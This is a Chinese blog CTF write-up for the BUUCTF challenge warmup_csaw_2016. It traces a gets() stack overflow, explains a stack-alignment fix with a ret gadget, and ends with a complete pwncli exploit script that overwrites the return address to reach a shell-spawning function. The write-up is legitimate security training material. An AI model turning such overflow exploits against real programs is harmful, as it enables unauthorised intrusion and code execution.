首页 > 其他分享 >2-warmup_csaw_2016

2-warmup_csaw_2016

时间:2023-03-07 19:12:15浏览次数:55  
标签:remote warmup gift libc ELF debug 2016 csaw

warmup_csaw_2016

题目链接

https://buuoj.cn/challenges#warmup_csaw_2016

检查保护

image

IDA分析

main

image

sub_40060D

image

栈_v5

漏洞:此处的gets存在栈溢出

image

运行

image

问题

此处movaps检查到栈未对齐,程序中断,需要进行栈对齐

image

ROPgadget查找ret

image

思路

  • 利用gets函数进行栈溢出
  • 栈对齐

成功getshell

image

EXP

#!/usr/bin/env python3
from pwncli import *
from libcfind import *

cli_script()  # 使用脚本模式必须显式调用这个函数

# 你能够从gift里面取到很多东西
io = gift['io']  # process或remote对象
elf = gift["elf"]  # ELF对象,ELF("./pwn")
libc = gift.libc  # ELF对象, ELF("./libc.so.6")

filename = gift.filename  # current filename
is_debug = gift.debug  # is debug or not
is_remote = gift.remote  # is remote or not
gdb_pid = gift.gdb_pid  # gdb pid if debug

# 有时候远程提供的libc与本地不一样,打靶机时替换libc为远程libc
if gift.remote:
    libc = ELF(
        "./home/wxp/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
    gift['libc'] = libc

# 这里写下攻击函数等

sla('>',flat({
    0x48:[
        0x4004a1,
        0x40060d
    ],
}))

io.interactive()  # 与socket保持交互

标签:remote,warmup,gift,libc,ELF,debug,2016,csaw
From: https://www.cnblogs.com/MSTLE/p/17189226.html

相关文章

  • exchange2016服务器的DAG的部署
    现在大家都开始用exchange2016的邮件系统了。原先的的exchange2010也需要升级了。要么升级,要exchange2010和exchange2016共存。我是在把原来虚拟机的环境卸载后重新安装的......
  • 我的十年编程路 2016年篇
    时光匆匆,2016年来了,此时的我已经工作了3年有余。过去的三年,虽有坎坷,但总体顺利,是个逐渐上升的线。进入2016年后,我不再做那些技术探索方面的App了。部门的拳头产品——加密......
  • 财政收入影响因素分析及预测(2014-2016)
    importnumpyasnpimportpandasaspdimportmatplotlib.pyplotaspltdata=pd.read_csv('./data/data.csv')data#%%x=data.iloc[:,0:-1]y=data.iloc[:,-1]......
  • 财政收入影响因素分析及预测(2014-2016)
    importnumpyasnpimportpandasaspdimportmatplotlib.pyplotaspltimportseabornassnsinputfile=r"C:\Users\asus\Desktop\data.csv"data=pd.read_csv(inputf......
  • 预测2016财政
    importnumpyasnpimportpandasaspdfromsklearn.linear_modelimportLassoinputfile1='E:/data/data.csv'data=pd.read_csv(inputfile1)lasso=Lasso(1000)l......
  • BUUctf pwn1_sctf_2016 nc尝试
    BUUctfpwn1_sctf_2016file,发现文件是32位elfchecksec,发现文件开启了NX保护,NX指的是NoExcute(禁止运行)IDA查看函数,发现main()调用了vuln(),而且存在一个get_flag函数,地......
  • BUUctf warmup_csaw_2016
    BUUwarmup_csaw_2016首先file,发现是64位ELF文件。IDA发现main函数中return了get函数,存在溢出点。查看文件中的字符串,发现有'catflag.txt'双击后发现在sub_40060D......
  • Microsoft Office 2016 专业增强版 for Windows 官网下载地址
    MicrosoftOffice2016专业增强版是Microsoft公司推出的一款高级的办公软件套件,包括Word、Excel、PowerPoint、Outlook、OneNote、Access、Publisher、SkypeforBusiness......
  • P6666 [清华集训2016] 数据交互 题解
    ##P6666[清华集训2016]数据交互题解###简要题意:n个点的树,m次操作,分别为添加一条路径$(u_i,v_i,w_i)$,和撤消一条路径,每一次操作后求出一条路径使得与这条路径有交的......
  • P3247 [HNOI2016]最小公倍数 题解
    题意简述:给定一个无向图,边权带两个值\((a,b)\),给定\(q\)次询问,每次询问给定两个点,求两个点直接是否有\(\max(a)=x\)且\(\max(b)=y\)的简单或非简单路径。解:如果......